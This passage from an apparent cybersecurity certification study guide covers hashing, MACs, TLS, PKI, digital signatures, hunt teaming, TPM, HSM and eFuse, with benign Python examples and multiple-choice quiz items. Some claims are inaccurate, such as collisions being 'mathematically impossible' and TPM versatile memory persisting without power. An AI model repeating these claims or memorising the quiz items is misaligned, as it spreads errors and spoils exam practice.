using the same method. The source adds up the values of
the bytes and sends the data and its checksum. The
receiving end receives the information, adds up the bytes
in the same way the source did, and gets the checksum.
The receiver then compares his checksum with the
source’s checksum. If the values match, message
integrity is intact. If the values do not match, the data
should be re-sent or replaced. Checksums are also
referred to as hash sums because they typically use hash
functions for the computation.
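Both ideas are easy to demonstrate in Python: a naive checksum simply sums the byte values, and zlib.crc32 from the standard library computes a 32-bit CRC. The message content is a made-up example:

import zlib

data = b"transfer $100 to account 42"

def simple_checksum(payload: bytes) -> int:
    # Naive checksum: sum of byte values, truncated to 16 bits.
    return sum(payload) & 0xFFFF

print(simple_checksum(data))
print(zlib.crc32(data))

# Flipping a single bit changes the CRC, so the values no longer match.
tampered = bytes([data[0] ^ 0x01]) + data[1:]
print(zlib.crc32(tampered) == zlib.crc32(data))  # False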
Message integrity is provided by hash functions and
message authentication code, as discussed next.
Hashing Functions
Hash functions are used to ensure integrity. This section
discusses some of the most popular hash functions.
Some of these might no longer be commonly used
because more secure alternatives are available. Security
professionals should be familiar with the following hash
functions:
• One-way hash
• MD2/MD4/MD5/MD6
• SHA/SHA-2/SHA-3
A hash function takes a message of variable length and
produces a fixed-length hash value. Hash values, also
referred to as message digests, are calculated using the
original message. If the receiver calculates a hash value
that is the same, then the original message is intact. If
the receiver calculates a hash value that is different, then
the original message has been altered.
For a given hash function H, any two different messages, M1 and M2, must produce different hash values; otherwise, one message could be replaced with the other without detection:
H(M1) ≠ H(M2)
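This behavior is easy to observe with Python's hashlib; even a one-character alteration produces a completely different digest:

import hashlib

m1 = b"pay the vendor $100"
m2 = b"pay the vendor $900"  # a one-character alteration

print(hashlib.sha256(m1).hexdigest())
print(hashlib.sha256(m2).hexdigest())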
One-way Hash
For a one-way hash to be effective, creating two different
messages with the same hash value must be
mathematically impossible. Given a hash value,
discovering the original message from which the hash
value was obtained must be mathematically impossible.
A one-way hash algorithm is collision free if it provides
protection against creating the same hash value from
different messages.
Unlike symmetric and asymmetric algorithms, the
hashing algorithm is publicly known. Hash functions are
always performed in one direction; reversing them is neither necessary nor feasible.
However, one-way hash functions do have limitations. If
an attacker intercepts a message that contains a hash
value, the attacker can alter the original message to
create a second, invalid message with a new hash value.
If the attacker then sends the invalid message to the
intended recipient, the intended recipient has no way of
knowing that he received an incorrect message. When
the receiver performs a hash value calculation, the
invalid message looks valid because the invalid message
was appended with the attacker’s new hash value, not the
original message’s hash value.
To prevent the preceding scenario from occurring, the
sender should use a message authentication code
(MAC). Encrypting the hash function with a symmetric
key algorithm generates a keyed MAC. The symmetric
key does not encrypt the original message. It is used only
to protect the hash value.
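Encrypting the hash with a symmetric key is one way to build a MAC; the HMAC construction in Python's standard library achieves the same goal by mixing the key into the hash computation. The shared key and messages below are hypothetical:

import hashlib
import hmac

shared_key = b"hypothetical shared secret"  # known only to sender and receiver
message = b"pay the vendor $100"

# The sender computes the MAC and transmits it with the message.
tag = hmac.new(shared_key, message, hashlib.sha256).digest()

# The receiver recomputes the MAC; compare_digest resists timing attacks.
expected = hmac.new(shared_key, message, hashlib.sha256).digest()
print(hmac.compare_digest(tag, expected))  # True

# An attacker who alters the message cannot forge a valid tag without the key.
forged = hmac.new(b"wrong key", b"pay the vendor $900", hashlib.sha256).digest()
print(hmac.compare_digest(tag, forged))  # False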
Figure 8-30 outlines the basic steps of a hash function.
Figure 8-30 Hash Function Process
Message Digest Algorithm
The MD2 message digest algorithm produces a 128-bit
hash value. It performs 18 rounds of computations.
Although MD2 is still in use today, it is much slower than
MD4, MD5, and MD6.
The MD4 algorithm also produces a 128-bit hash value.
However, it performs only three rounds of computations.
Although MD4 is faster than MD2, its use has
significantly declined because attacks against it have
been so successful.
Like the other MD algorithms, the MD5 algorithm
produces a 128-bit hash value. It performs four rounds of
computations. It was originally created because of the
issues with MD4, and it is more complex than MD4.
However, MD5 is not collision free. For this reason, it
should not be used for SSL/TLS certificates or digital
signatures. The U.S. government requires the usage of
SHA-2 instead of MD5. However, in commercial usage,
many software vendors publish the MD5 hash value
when they release software patches so customers can
verify the software’s integrity after download.
The MD6 algorithm produces a variable hash value,
performing a variable number of computations.
Although it was originally introduced as a candidate for
SHA-3, it was withdrawn because of early issues the
algorithm had with differential attacks. MD6 has since
been re-released with this issue fixed. However, that
release was too late to be accepted as the NIST SHA-3
standard.
Secure Hash Algorithm
Secure Hash Algorithm (SHA) is a family of four
algorithms published by NIST. SHA-0, originally
referred to as simply SHA because there were no other
“family members,” produces a 160-bit hash value after
performing 80 rounds of computations on 512-bit blocks.
SHA-0 was never very popular because collisions were
discovered.
Like SHA-0, SHA-1 produces a 160-bit hash value after
performing 80 rounds of computations on 512-bit blocks.
SHA-1 corrected the flaw in SHA-0 that made it
susceptible to attacks.
SHA-2, the successor to SHA-1, is itself a family of functions (SHA-224, SHA-256, SHA-384, and SHA-512) whose names reflect the bit lengths of the hash values they produce.
SHA-3, the latest version, is actually a family of hash
functions, each of which provides different functional
limits. The SHA-3 family is as follows:
• SHA3-224: Produces a 224-bit hash value after performing 24 rounds of computations on 1152-bit blocks
• SHA3-256: Produces a 256-bit hash value after performing 24 rounds of computations on 1088-bit blocks
• SHA3-384: Produces a 384-bit hash value after performing 24 rounds of computations on 832-bit blocks
• SHA3-512: Produces a 512-bit hash value after performing 24 rounds of computations on 576-bit blocks
Keep in mind that SHA-1 and SHA-2 are still widely used
today. SHA-3 was not developed because of some
security flaw with the two previous standards but was
instead proposed as an alternative hash function to the
others.
Transport Encryption
Securing data at rest and data in transit leverages the
respective strengths and weaknesses of symmetric and
asymmetric algorithms. Applying the two types of
algorithms is typically done as shown in Table 8-7.
Table 8-7 Applying Cryptography
Transport encryption ensures that data is protected
when it is transmitted over a network or the Internet.
Transport encryption protects against network sniffing
attacks.
Security professionals should ensure that their
enterprises are protected using transport encryption in
addition to protecting data at rest. As an example, think
of an enterprise that implements token and biometric
authentication for all users, protected administrator
accounts, transaction logging, full-disk encryption,
server virtualization, port security, firewalls with ACLs,
NIPS, and secured access points. None of these solutions
provides any protection for data in transport. Transport
encryption would be necessary in this environment to
protect data. To provide this encryption, secure
communication mechanisms should be used, including
SSL/TLS, HTTP/HTTPS/SHTTP, SET, SSH, and IPsec.
SSL/TLS
Secure Sockets Layer (SSL) is a transport-layer protocol
that provides encryption, server and client
authentication, and message integrity. SSL/TLS was
discussed earlier in this chapter.
HTTP/HTTPS/SHTTP
Hypertext Transfer Protocol (HTTP) is the protocol used
on the Web to transmit website data between a web
server and a web client. With each new address that is
entered into the web browser, whether from initial user
entry or by clicking a link on the page displayed, a new
connection is established because HTTP is a stateless
protocol.
HTTP Secure (HTTPS) is the implementation of HTTP
running over the SSL/TLS protocol, which establishes a
secure session using the server’s digital certificate.
SSL/TLS keeps the session open using a secure channel.
HTTPS websites always include the https:// designation
at the beginning.
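To see the TLS handshake and certificate validation in action, you can open a TLS-protected connection with Python's standard ssl and socket modules. This is a minimal sketch; example.com stands in for any HTTPS server:

import socket
import ssl

context = ssl.create_default_context()  # validates the server certificate against trusted CAs

with socket.create_connection(("example.com", 443)) as sock:
    # server_hostname enables SNI and hostname verification
    with context.wrap_socket(sock, server_hostname="example.com") as tls:
        print(tls.version())                 # negotiated protocol, e.g., TLSv1.3
        print(tls.getpeercert()["subject"])  # subject of the server's certificate
        tls.sendall(b"GET / HTTP/1.1\r\nHost: example.com\r\nConnection: close\r\n\r\n")
        print(tls.recv(120))                 # beginning of the HTTP response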
Although it sounds similar to HTTPS, Secure HTTP (S-HTTP) protects HTTP communication in a different manner. S-HTTP encrypts only a single communication message, not an entire session (or conversation). S-HTTP is not as commonly used as HTTPS.
SSH
Secure Shell (SSH) is an application and protocol that
is used to remotely log in to another computer using a
secure tunnel. After the secure channel is established and a session key is exchanged, all communication
between the two computers is encrypted over the secure
channel.
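As an illustration, the widely used third-party paramiko library can establish such a tunnel from Python. This is a sketch under stated assumptions, not an endorsement of a particular client; the hostname, username, and key path are placeholders:

import os
import paramiko  # third-party library: pip install paramiko

client = paramiko.SSHClient()
client.load_system_host_keys()                               # trust hosts already in known_hosts
client.set_missing_host_key_policy(paramiko.RejectPolicy())  # refuse servers we have never seen

client.connect("server.example.com", username="analyst",
               key_filename=os.path.expanduser("~/.ssh/id_rsa"))
stdin, stdout, stderr = client.exec_command("uptime")        # runs over the encrypted channel
print(stdout.read().decode())
client.close()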
IPsec
Internet Protocol Security (IPsec) is a suite of protocols
that establishes a secure channel between two devices.
IPsec is commonly implemented over VPNs. IPsec was
discussed earlier in this chapter.
CERTIFICATE MANAGEMENT
A public key infrastructure (PKI) includes systems,
software, and communication protocols that distribute,
manage, and control public key cryptography. A PKI
publishes digital certificates. Because a PKI establishes
trust within an environment, a PKI can certify that a
public key is tied to an entity and verify that a public key
is valid. Public keys are published through digital
certificates.
The X.509 standard is a framework that enables
authentication between networks and over the Internet.
A PKI includes timestamping and certificate revocation
to ensure that certificates are managed properly. A PKI
provides confidentiality, message integrity,
authentication, and non-repudiation.
The structure of a PKI includes certificate authorities,
certificates, registration authorities, certificate
revocation lists, cross-certification, and the Online
Certificate Status Protocol (OCSP). This section discusses
these PKI components as well as a few other PKI
concepts.
Certificate Authority and Registration
Authority
Any participant that requests a certificate must first go
through the registration authority (RA), which
verifies the requestor’s identity and registers the
requestor. After the identity is verified, the RA passes the
request to the certificate authority.
A certificate authority (CA) is the entity that creates
and signs digital certificates, maintains the certificates,
and revokes them when necessary. Every entity that
wants to participate in the PKI must contact the CA and
request a digital certificate. The CA is the ultimate authority for the authenticity of every participant in the PKI because it signs each digital certificate. The certificate binds the
identity of the participant to the public key.
There are different types of CAs. Some organizations provide PKI as a paid service to companies that need it; Verisign is one example. Other organizations implement their own private CAs so that the organization can control all aspects of the PKI process. If an organization is large enough, it might need to provide a structure of CAs, with the root CA being the highest in the hierarchy.
Because more than one entity is often involved in the PKI
certification process, certification path validation allows
the participants to check the legitimacy of the certificates
in the certification path.
Certificates
A digital certificate provides an entity, usually a user,
with the credentials to prove its identity and associates
that identity with a public key. At minimum, a digital
certificate must provide the serial number, the issuer,
the subject (owner), and the public key.
An X.509 certificate complies with the X.509 standard.
An X.509 certificate contains the following fields:
• Version
• Serial Number
• Algorithm ID
• Issuer
• Validity
• Subject
• Subject Public Key Info
• Public Key Algorithm
• Subject Public Key
• Issuer Unique Identifier (optional)
• Subject Unique Identifier (optional)
• Extensions (optional)
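Most of these fields can be inspected programmatically. As a sketch, the third-party cryptography library (pip install cryptography) can parse a PEM-encoded certificate; server.pem is a hypothetical filename:

from cryptography import x509

with open("server.pem", "rb") as f:
    cert = x509.load_pem_x509_certificate(f.read())

print("Version:      ", cert.version)
print("Serial Number:", cert.serial_number)
print("Issuer:       ", cert.issuer.rfc4514_string())
print("Subject:      ", cert.subject.rfc4514_string())
print("Validity:     ", cert.not_valid_before, "to", cert.not_valid_after)
print("Algorithm ID: ", cert.signature_hash_algorithm.name)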
Verisign first introduced the following digital certificate
classes:
• Class 1: Intended for use with email. These certificates are stored by web browsers.
• Class 2: For organizations that must provide
proof of identity.
• Class 3: For servers and software signing in
which independent verification and identity and
authority checking is done by the issuing CA.
Certificate Revocation List
A certificate revocation list (CRL) is a list of digital
certificates that a CA has revoked. To find out whether a
digital certificate has been revoked, the browser must
either check the CRL or the CA must push out the CRL
values to clients. This can become quite daunting when
you consider that the CRL contains every certificate that
has ever been revoked.
One concept to keep in mind is the revocation request
grace period. This period is the maximum amount of
time between when the revocation request is received by
the CA and when the revocation actually occurs. A
shorter grace period provides better security but often results in a higher implementation cost.
OCSP
The Online Certificate Status Protocol (OCSP) is
an Internet protocol that obtains the revocation status of
an X.509 digital certificate. OCSP is an alternative to the
standard certificate revocation list (CRL) that is used by
many PKIs. OCSP automatically validates the certificates
and reports back the status of the digital certificate by
accessing the CRL on the CA.
PKI Steps
The steps involved in requesting a digital certificate are
as follows:
1. A user requests a digital certificate, and the RA
receives the request.
2. The RA requests identifying information from the
requestor.
3. After the required information is received, the RA
forwards the certificate request to the CA.
4. The CA creates a digital certificate for the
requestor. The requestor’s public key and identity
information are included as part of the certificate.
5. The user receives the certificate.
After the user has a certificate, she is ready to
communicate with other trusted entities. The process for
communication between entities is as follows:
1. User 1 requests User 2’s public key from the
certificate repository.
2. The repository sends User 2’s digital certificate to
User 1.
3. User 1 verifies the certificate and extracts User 2’s
public key.
4. User 1 encrypts the session key with User 2’s public
key and sends the encrypted session key and User
1’s certificate to User 2.
5. User 2 receives User 1’s certificate and verifies the
certificate with a trusted CA.
After this certificate exchange and verification process
occurs, the two entities are able to communicate using
encryption.
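Step 4 above is the heart of hybrid cryptography: a symmetric session key is wrapped with the recipient's public key. The following is a minimal sketch using the third-party cryptography library; the freshly generated key pair stands in for User 2's certificate-backed keys:

import os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding

user2_private = rsa.generate_private_key(public_exponent=65537, key_size=2048)
user2_public = user2_private.public_key()  # in practice, extracted from User 2's certificate

session_key = os.urandom(32)               # 256-bit symmetric session key, chosen by User 1
oaep = padding.OAEP(mgf=padding.MGF1(hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)

wrapped = user2_public.encrypt(session_key, oaep)      # only User 2 can unwrap this
assert user2_private.decrypt(wrapped, oaep) == session_key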
Cross-Certification
Cross-certification establishes trust relationships
between CAs so that the participating CAs can rely on the
other participants’ digital certificates and public keys. It
enables users to validate each other’s certificates when
they are actually certified under different certification
hierarchies. A CA for one organization can validate
digital certificates from another organization’s CA when
a cross-certification trust relationship exists.
Digital Signatures
A digital signature is a hash value encrypted with the
sender’s private key. A digital signature provides
authentication, non-repudiation, and integrity. A blind
signature is a form of digital signature where the
contents of the message are masked before it is signed.
Public key cryptography is used to create digital
signatures. Users register their public keys with a
certificate authority (CA), which distributes a certificate
containing the user’s public key and the CA’s digital
signature. The certificate's signature is computed by combining the user's public key and validity period with the certificate issuer and the digital signature algorithm identifier.
The Digital Signature Standard (DSS) is a federal standard that governs the Digital Signature Algorithm (DSA). DSA generates a message digest of 160 bits. The U.S. federal government requires the use of DSA, RSA, or Elliptic Curve DSA (ECDSA) and SHA for
digital signatures. DSA is slower than RSA and only
provides digital signatures. RSA provides digital
signatures, encryption, and secure symmetric key
distribution.
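The sign-then-verify flow can be demonstrated with RSA in the third-party cryptography library. This is a minimal sketch; in a real PKI, the verifier would take the public key from the signer's certificate rather than generating the pair locally:

from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding

private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
message = b"Wire $10,000 to account 12345"
pss = padding.PSS(mgf=padding.MGF1(hashes.SHA256()),
                  salt_length=padding.PSS.MAX_LENGTH)

# The message is hashed with SHA-256, and the digest is signed with the private key
signature = private_key.sign(message, pss, hashes.SHA256())

# verify() raises InvalidSignature if the message or signature was altered
private_key.public_key().verify(signature, message, pss, hashes.SHA256())
print("Signature verified: authentication, integrity, and non-repudiation hold")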
When considering cryptography, keep the following facts
in mind:
• Encryption provides confidentiality.
• Hashing provides integrity.
• Digital signatures provide authentication, non-repudiation, and integrity.
ACTIVE DEFENSE
The importance of defense systems in network
architecture is emphasized throughout this book. In the
context of cybersecurity, the term active defense has
more to do with process than architecture. Active defense
is achieved by aligning your incident identification and
incident response processes such that there is an element
of automation built into your reaction to any specific
issue. So what does that look like in the real world? One
approach among several is called the Active Cyber
Defense Cycle, illustrated in Figure 8-31.
Figure 8-31 Active Cyber Defense Cycle
While it may not be obvious from the graphic, one of the
key characteristics of this approach is that there is an
active response to the security issue. This departs from
the classic approach of deploying passive defense
mechanisms and relying on them to protect assets.
Hunt Teaming
Hunt teaming is a new approach to security that is
offensive in nature rather than defensive, which has been
the common approach of security teams in the past.
Hunt teams work together to detect, identify, and
understand advanced and determined threat actors. A
hunt team is a costly investment on the part of an
organization. They target the attackers. To use a bank
analogy, when a bank robber compromises a door to rob
a bank, defensive measures would say get a better door,
while offensive measures (hunt teaming) would say
eliminate the bank robber. These cyber guns-for-hire are
another tool in the kit.
Hunt teaming also refers to a collection of techniques
used by security personnel to bypass traditional security
technologies to hunt down other attackers who may have
used similar techniques to mount attacks that have
already been identified, often by other companies. These
techniques help in identifying any systems compromised
using advanced malware that bypasses traditional
security technologies, such as an intrusion detection
system/intrusion prevention system (IDS/IPS) or an
antivirus application. As part of hunt teaming, security
professionals could also obtain blacklists from sources
like DShield (https://www.dshield.org/). These
blacklists would then be compared to existing DNS
entries to see if communication was occurring with
systems on these blacklists that are known attackers.
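The comparison itself is easy to script. Below is a minimal sketch, assuming a downloaded blocklist and an exported DNS query log; both filenames and the log layout are hypothetical:

# dshield_blocklist.txt: one address or hostname per line (hypothetical export)
with open("dshield_blocklist.txt") as f:
    blocklist = {line.strip() for line in f if line.strip()}

# dns_queries.log: assumes the queried name is the last whitespace-separated field
with open("dns_queries.log") as f:
    queried = {line.split()[-1] for line in f if line.strip()}

for host in sorted(queried & blocklist):
    print("Possible communication with known attacker:", host)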
Hunt teaming can also emulate prior attacks so that
security professionals can better understand the
enterprise’s existing vulnerabilities and get insight into
how to remediate and prevent future incidents.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 8-8 lists a reference of these key topics and the
page numbers on which each is found.
Table 8-8 Key Topics in Chapter 8
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
asset tagging
geotagging
geofencing
radio frequency identification (RFID)
segmentation
extranet
demilitarized zone (DMZ)
virtual local-area network (VLAN)
jumpbox
system isolation
air gap
bastion host
dual-homed firewall
multihomed firewall
screened host firewall
screened subnet
control plane
data plane
management plane
virtual storage area network (SAN)
virtual private cloud (VPC)
virtual private network (VPN)
Point-to-Point Tunneling Protocol (PPTP)
Layer 2 Tunneling Protocol (L2TP)
Internet Protocol Security (IPsec)
Authentication Header (AH)
Encapsulating Security Payload (ESP)
Internet Security Association and Key Management
Protocol (ISAKMP)
Internet Key Exchange (IKE)
Secure Sockets Layer/Transport Layer Security
(SSL/TLS)
change management
Type 1 hypervisor
Type 2 hypervisor
VM escape
virtual desktop infrastructure (VDI)
containerization
multifactor authentication (MFA)
knowledge factor authentication
ownership factor authentication
characteristic factor authentication
single sign-on (SSO)
Active Directory (AD)
Secure European System for Applications in a
Multivendor Environment (SESAME)
Service Provisioning Markup Language (SPML)
Security Assertion Markup Language (SAML)
OpenID
Shibboleth
role-based access control (RBAC)
attribute-based access control (ABAC)
mandatory access control (MAC)
cloud access security broker (CASB)
honeypot
symmetric algorithms
stream-based ciphers
block ciphers
asymmetric algorithms
Secure Shell (SSH)
public key infrastructure (PKI)
registration authority (RA)
certificate authority (CA)
Online Certificate Status Protocol (OCSP)
certificate revocation list (CRL)
active defense
hunt teaming
REVIEW QUESTIONS
1. _____________________ is the process of
placing physical identification numbers of some
sort on all assets.
2. List at least two examples of segmentation.
3. Match the following terms with their definitions.
4. In a(n) _____________________, two
firewalls are used, and traffic must be inspected at
both firewalls before it can enter the internal
network.
5. List at least one of the network architecture planes.
6. Match the following terms with their definitions.
7. ____________________________ handles
the creation of a security association for the session
and the exchange of keys in IPsec.
8. List at least two advantages of SSL/TLS.
9. Match the following terms with their definitions.
10. ______________________ are authentication
factors that rely on something you have in your possession.
Chapter 9. Software
Assurance Best Practices
[This content is currently
in development.]
This content is currently in development.
Chapter 10. Hardware
Assurance Best Practices
This chapter covers the following topics related to
Objective 2.3 (Explain hardware assurance best
practices) of the CompTIA Cybersecurity Analyst
(CySA+) CS0-002 certification exam:
• Hardware root of trust: Introduces the
Trusted Platform Module (TPM) and hardware
security module (HSM)
• eFuse: Covers the dynamic real-time
reprogramming of computer chips
• Unified Extensible Firmware Interface
(UEFI): Discusses the newer UEFI firmware
interface
• Trusted foundry: Describes a program for
hardware sourcing assurance
• Secure processing: Covers Trusted Execution,
secure enclave, processor security extensions, and
atomic execution
• Anti-tamper: Explores methods of preventing
physical attacks
• Self-encrypting drive: Covers automatic drive
protections
• Trusted firmware updates: Discusses methods
for safely acquiring firmware updates
• Measured Boot and attestation: Covers boot
file protections
• Bus encryption: Describes the use of encrypted
program instructions on a data bus
Organizations acquire hardware and services as part of
day-to-day business. The supply chain for tangible
property is vital to every organization. An organization
should understand all risks for the supply chain and
implement a risk management program that is
appropriate for it. This chapter discusses best practices
for ensuring that all hardware is free of security issues
out of the box.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these ten self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks” section. Table 10-1 lists the major
headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This
Already?” quiz appear in Appendix A.
Table 10-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
1. Which of the following is a draft publication that
gives guidelines on hardware-rooted security in
mobile devices?
a. NIST SP 800-164
b. IEEE 802.11ac
c. FIPS 120
d. ISO/IEC 27017
2. Which of the following allows for the dynamic real-time reprogramming of computer chips?
a. TAXII
b. eFuse
c. UEFI
d. TPM
3. Which of the following is designed as a replacement
for the traditional PC BIOS?
a. TPM
b. Secure boot
c. UEFI
d. NX bit
4. Which of the following ensures that systems have
access to leading-edge integrated circuits from
secure, domestic sources?
a. DoD
b. FIPS 120
c. OWASP
d. Trusted Foundry
5. Which of the following is a part of an operating
system that cannot be compromised even when the
operating system kernel is compromised?
a. Secure enclave
b. Processor security extensions
c. Atomic execution
d. XN bit
6. Which of the following technologies can zero out
sensitive data if it detects penetration of its security
and may even do this with no power?
a. TPM
b. Anti-tamper
c. Secure enclave
d. Measured boot
7. Which of the following is used to provide
transparent encryption on self-encrypting drives?
a. DEK
b. TPM
c. UEFI
d. ENISA
8. Which of the following is the key to trusted
firmware updates?
a. Obtain firmware updates only from the vendor
directly
b. Use a third-party facilitator to obtain updates
c. Disable Secure Boot
d. Follow the specific directions with the update
9. Windows Secure Boot is an example of what
technology?
a. Security extensions
b. Secure enclave
c. UEFI
d. Measured boot
10. What is used by newer Microsoft operating systems
to protect certificates, BIOS, passwords, and
program authenticity?
a. Security extensions
b. Bus encryption
c. UEFI
d. Secure enclaves
FOUNDATION TOPICS
HARDWARE ROOT OF
TRUST
NIST SP 800-164 is a draft Special Publication that gives
guidelines on hardware-rooted security in mobile
devices. It defines three required security components
for mobile devices: Roots of Trust (RoTs), an
application programming interface (API) to expose the
RoTs to the platform, and a Policy Enforcement Engine
(PEnE).
Roots of Trust are the foundation of assurance of the
trustworthiness of a mobile device. RoTs must always
behave in an expected manner because their misbehavior
cannot be detected. Hardware RoTs are preferred over
software RoTs due to their immutability, smaller attack
surfaces, and more reliable behavior. They can provide a
higher degree of assurance that they can be relied upon
to perform their trusted function or functions. Software
RoTs could provide the benefit of quick deployment to
different platforms. To support device integrity,
isolation, and protected storage, devices should
implement the following RoTs:
• Root of Trust for Storage (RTS)
• Root of Trust for Verification (RTV)
• Root of Trust for Integrity (RTI)
• Root of Trust for Reporting (RTR)
• Root of Trust for Measurement (RTM)
The RoTs need to be exposed by the operating system to
applications through an open API. This provides
application developers a set of security services and
capabilities they can use to secure their applications and
protect the data they process. By providing an abstracted
layer of security services and capabilities, these APIs can
reduce the burden on application developers to
implement low-level security features, and instead allow
them to reuse trusted components provided in the RoTs
and the OS. The APIs should be standardized within a
given mobile platform and, to the extent possible, across
platforms. Applications can use the APIs, and the
associated RoTs, to request device integrity reports,
protect data through encryption services provided by the
RTS, and store and retrieve authentication credentials
and other sensitive data.
The PEnE enforces policies on the device with the help of
other device components and enables the processing,
maintenance, and management of policies on both the
device and in the information owners’ environments. The
PEnE provides information owners with the ability to
express the control they require over their information.
The PEnE needs to be trusted to implement the
information owner’s requirements correctly and to
prevent one information owner’s requirements from
adversely affecting another’s. To perform key functions,
the PEnE needs to be able to query the device’s
configuration and state.
Mobile devices should implement the following three
mobile security capabilities to address the challenges
with mobile device security:
• Device integrity: Device integrity is the absence
of corruption in the hardware, firmware, and
software of a device. A mobile device can provide
evidence that it has maintained device integrity if
its software, firmware, and hardware
configurations can be shown to be in a state that is
trusted by a relying party.
• Isolation: Isolation prevents unintended
interaction between applications and information
contexts on the same device.
• Protected storage: Protected storage preserves
the confidentiality and integrity of data on the
device while at rest, while in use (in the event an
unauthorized application attempts to access an
item in protected storage), and upon revocation of
access.
Trusted Platform Module (TPM)
Controlling network access to devices is helpful, but in
many cases, devices such as laptops, tablets, and
smartphones leave your network, leaving behind all the
measures you have taken to protect the network. There is
also a risk of these devices being stolen or lost. For these
situations, the best measure to take is full disk
encryption.
The best implementation of full disk encryption requires
and makes use of a Trusted Platform Module
(TPM) chip. A TPM chip is a security chip installed on a
computer’s motherboard that is responsible for
protecting symmetric and asymmetric keys, hashes, and
digital certificates. This chip provides services to protect
passwords and encrypt drives and digital rights, making
it much harder for attackers to gain access to the
computers that have TPM chips enabled.
Two particularly popular uses of TPM are binding and
sealing. Binding actually “binds” the hard drive through
encryption to a particular computer. Because the
decryption key is stored in the TPM chip, the hard drive’s
contents are available only when the drive is connected
to the original computer. But keep in mind that all the
contents are at risk if the TPM chip fails and a backup of
the key does not exist.
Sealing, on the other hand, “seals” the system state to a
particular hardware and software configuration. This
prevents attackers from making any changes to the
system. However, it can also make installing a new piece
of hardware or a new operating system much harder. The
system can only boot after the TPM chip verifies system
integrity by comparing the original computed hash value
of the system’s configuration to the hash value of its
configuration at boot time.
A TPM chip consists of both persistent memory and versatile memory, which together retain important information when the computer is turned off:
• Endorsement key (EK): The EK is persistent
memory installed by the manufacturer that
contains a public/private key pair.
• Storage root key (SRK): The SRK is persistent
memory that secures the keys stored in the TPM.
• Attestation identity key (AIK): The AIK is
versatile memory that ensures the integrity of the
EK.
• Platform configuration register (PCR)
hash: A PCR hash is versatile memory that stores
data hashes for the sealing function.
• Storage keys: A storage key is versatile memory
that contains the keys used to encrypt the
computer’s storage, including hard drives, USB
flash drives, and so on.
BitLocker and BitLocker to Go by Microsoft are well-known full disk encryption products. The former is used
to encrypt hard drives, including operating system
drives, and the latter is used to encrypt information on
portable devices such as USB devices. However, there are
other options. Additional whole disk encryption products
include
• PGP Whole Disk Encryption
• SecurStar DriveCrypt
• Sophos SafeGuard
• Trend Micro Maximum Security
Virtual TPM
A virtual TPM (VTPM) chip is a software object that
performs the functions of a TPM chip. It is a system that
enables trusted computing for an unlimited number of
virtual machines on a single hardware platform. A VTPM
makes secure storage and cryptographic functions
available to operating systems and applications running
in virtual machines.
Figure 10-1 shows one possible implementation of VTPM
by IBM. The TPM chip in the host system is replaced by a
more powerful VTPM (PCIXCC-vTPM). The virtual
machine (VM) named Dom-TPM is a VM whose only
purpose is to proxy for the PCIXCC-vTPM and make
TPM instances available to all other VMs running on the
system.
Figure 10-1 vTPM Possible Solution 1
Another possible approach suggested by IBM is to run
VTPMs on each VM, as shown in Figure 10-2. In this
case, the VM named Dom-TPM talks to the physical TPM
chip in the host and maintains separate TPM instances
for each VM.
Figure 10-2 VTPM Possible Solution 2
Hardware Security Module (HSM)
A hardware security module (HSM) is an
appliance that safeguards and manages digital keys used
with strong authentication and provides crypto
processing. It attaches directly to a computer or server.
Among the functions of an HSM are
• Onboard secure cryptographic key generation
• Onboard secure cryptographic key storage and
management
• Use of cryptographic and sensitive data material
• Offloading of application servers for complete
asymmetric and symmetric cryptography
HSM devices can be used in a variety of scenarios,
including the following:
• In a PKI environment to generate, store, and
manage key pairs
• In card payment systems to encrypt PINs and to
load keys into protected memory
• To perform the processing for applications that
use TLS/SSL
• In Domain Name System Security Extensions
(DNSSEC; a secure form of DNS that protects the
integrity of zone files) to store the keys used to
sign the zone file
There are some drawbacks to an HSM, including the
following:
• High cost
• Lack of a standard for the strength of the random
number generator
• Difficulty in upgrading
When selecting an HSM product, you must ensure that it
provides the services needed, based on its application.
Remember that each HSM has different features and
different encryption technologies, and some HSM
devices might not support a strong enough encryption
level to meet an enterprise’s needs. Moreover, you
should keep in mind the portable nature of these devices
and protect the physical security of the area where they
are connected.
MicroSD HSM
A microSD HSM is an HSM that connects to the
microSD port on a device that has such a port. The card
is specifically suited for mobile apps written for Android
and is supported by most Android phones and tablets
with a microSD card slot.
Moreover, some microSD cards can be made to support various cryptographic algorithms, such as AES, RSA, SHA-1, SHA-256, and Triple DES, as well as the Diffie-Hellman key exchange, enabling them to provide the same protections as a microSD HSM. This is an advantage over microSD cards that lack such support.
EFUSE
Computer logic is generally hard-coded onto a chip and
cannot be changed after the chip is manufactured. An
eFuse allows for the dynamic real-time reprogramming
of computer chips. Utilizing a set of eFuses, a chip
manufacturer can allow for the circuits on a chip to
change while it is in operation.
One use is to prevent downgrading the firmware of a
device. Systems equipped with an eFuse will check the
number of burnt fuses before attempting to install new
firmware. If too many fuses are burnt (meaning the
firmware to be installed is older than the current
firmware), then the bootloader will prevent installation
of the older firmware.
An eFuse can also be used to help secure a stolen device.
For example, Samsung devices use an eFuse to indicate when an untrusted (non-Samsung) boot path is
discovered. Once the eFuse is set (when the path is
discovered), the device cannot read the data previously
stored.
UNIFIED EXTENSIBLE
FIRMWARE INTERFACE
(UEFI)
A computer’s BIOS contains the basic instruction that a
computer needs to boot and load the operating system
from a drive. The process of updating the BIOS with the
latest software is referred to as flashing the BIOS.
Security professionals should ensure that any BIOS
updates are obtained from the BIOS vendor and have not
been tampered with in any way.
The traditional BIOS has been replaced with the
Unified Extensible Firmware Interface (UEFI).
UEFI maintains support for legacy BIOS devices, but is
considered a more advanced interface than traditional
